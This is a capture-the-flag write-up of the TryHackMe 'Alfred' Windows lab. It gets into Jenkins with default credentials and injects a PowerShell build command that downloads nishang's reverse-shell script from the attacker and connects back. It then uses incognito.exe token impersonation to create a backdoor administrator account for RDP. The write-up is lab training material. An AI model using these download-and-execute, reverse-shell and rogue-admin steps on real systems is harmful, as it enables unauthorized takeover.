#tryhackme #windows #easy
![[Pasted image 20250710202706.png]]
---
# Information Gathering - Nmap
As always I began with nmap to scan all TCP ports.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nmap -sS $IP -Pn --open --min-rate 3000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-09 21:41 CDT
Nmap scan report for 10.10.212.94
Host is up (0.14s latency).
Not shown: 65532 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
3389/tcp open ms-wbt-server
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 44.64 seconds
```
Then I ran a more detailed scan against the found ports: 80, 3389, and 8080.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sCV -Pn $IP -p 80,3389,8080
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-09 21:44 CDT
Nmap scan report for 10.10.212.94
Host is up.
PORT STATE SERVICE VERSION
80/tcp filtered http
3389/tcp filtered ms-wbt-server
8080/tcp filtered http-proxy
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.35 seconds
```
Lastly, a UDP scan against top 10 ports
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sU $IP --top-ports 10 -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-09 21:44 CDT
Nmap scan report for 10.10.212.94
Host is up.
PORT STATE SERVICE
53/udp open|filtered domain
67/udp open|filtered dhcps
123/udp open|filtered ntp
135/udp open|filtered msrpc
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
161/udp open|filtered snmp
445/udp open|filtered microsoft-ds
631/udp open|filtered ipp
1434/udp open|filtered ms-sql-m
Nmap done: 1 IP address (1 host up) scanned in 3.17 seconds
```
# Footprinting
##### Port 80
This is the landing page. The source page didn't reveal anything interesting.
![[Pasted image 20250709214553.png]]
##### Port 8080
The landing page has a login form. We can clearly see that Jenkins is used here.
![[Pasted image 20250709215449.png]]
# Exploit - Initial Access
In the login form, I tried the default credentials `admin:admin` and they got me logged in! Now let's discover attack vectors to gain initial access.
![[Pasted image 20250709215914.png]]
I have found a feature that allows us to execute commands on the underlying system. To navigate there, go to `project`.
![[Pasted image 20250709234030.png]]
Now navigate to `Configure`
![[Pasted image 20250709234230.png]]
In the `Build` section, there's a space we can insert our Windows commands to be executed. For our purpose, I'm going to use the following payload to get a reverse shell:
```powershell
powershell iex (New-Object Net.WebClient).DownloadString('http://<IP>:<PORT>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <PORT>
```
![[Pasted image 20250709234908.png]]
In order to use the payload above, I need to first download `nishang`'s `Invoke-PowerShellTcp.ps1` reverse shell script from [here](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1)
The upper pane is for the Jenkins server to download `Invoke-PowerShellTcp.ps1` from my local Kali. The bottom pane is listener for receiving the reverse shell connection.
![[Pasted image 20250710000041.png]]
Insert our payload and select `Apply` then `Save` at the bottom.
![[Pasted image 20250710000236.png]]
Then it automatically redirects us to the `Project` page, select `Build Now` to execute our new build.
![[Pasted image 20250710000342.png]]
Under `Build History`, you can see our newly created build is being prepared.
![[Pasted image 20250710000622.png]]
Navigate back to the terminal, we can see that we got the reverse shell!
![[Pasted image 20250710000650.png]]
Found `user.txt` flag
```powershell
PS C:\Users\bruce\Desktop> dir
Directory: C:\Users\bruce\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 10/25/2019 11:22 PM 32 user.txt
PS C:\Users\bruce\Desktop> type user.txt
790...
```
# Privilege Escalation
The `whoami /priv` command displays the privileges that are granted to the user `bruce` and those that are not. We can see `SeDebugPrivilege`, `SeChangeNotifyPrivilege`, `SeImpersonatePrivilege`, and `SeCreateGlobalPrivilege` are enabled for bruce.
![[Pasted image 20250710002017.png]]
**For some reason my TryHackMe openvpn kept disconnecting to a point where I couldn't progress any further. Therefore, I am starting over with TryHackMe's built in VM. You can notice the different UI in the screenshots.**
`SeImpersonatePrivilege` allows a user or process to impersonate other users, including privileged ones like `SYSTEM`. This means the process can act as another user using their security token. I am going to use `incognito.exe` tool to take advantage of this and exploit the system for privilege escalation. I am using the standalone version not the `meterpreter` one.
I transferred `incognito.exe` from local environment to remote Windows system.
![[Pasted image 20250710195427.png]]
`./incognito.exe list_tokens -u` command is used to enumerate the tokens. We see that under the `Delegation Tokens Available` section, `NT AUTHORITY\SYSTEM` is listed meaning we can impersonate as `SYSTEM`, the highest privilege on Windows.
```powershell
PS C:\Temp> ./incognito.exe list_tokens -u
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Listing unique users found
Delegation Tokens Available
============================================
alfred\bruce
IIS APPPOOL\DefaultAppPool
NT AUTHORITY\IUSR
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
============================================
NT AUTHORITY\ANONYMOUS LOGON
Administrative Privileges Available
============================================
SeAssignPrimaryTokenPrivilege
SeCreateTokenPrivilege
SeTcbPrivilege
SeTakeOwnershipPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeRelabelPrivilege
SeLoadDriverPrivilege
```
Remember, we found port `3389` open running an RDP service. We can create a user, add the user to the administrator group, and connect to the service via RDP.
```powershell
PS C:\Temp> ./incognito.exe add_user wook wook413
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Attempting to add user wook to host 127.0.0.1
[+] Successfully added user
PS C:\Temp> ./incognito.exe add_localgroup_user Administrators wook
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Attempting to add user wook to local group Administrators on host 127.0.0.1
[+] Successfully added user to local group
```
After creating a user and adding the user to the administrator group, run `xfreerdp` to connect to the server as the credentials we just created, for our case `wook:wook413`.
```bash
xfreerdp /v:10.10.41.223 /u:wook /p:wook413 /dynamic-resolution
```
`whoami` returns `alfred\wook` and `net localgroup` command reveals that we are part of the `Administrators` group as we expected.
![[Pasted image 20250710201903.png]]
Found `root.txt` flag!
![[Pasted image 20250710202638.png]]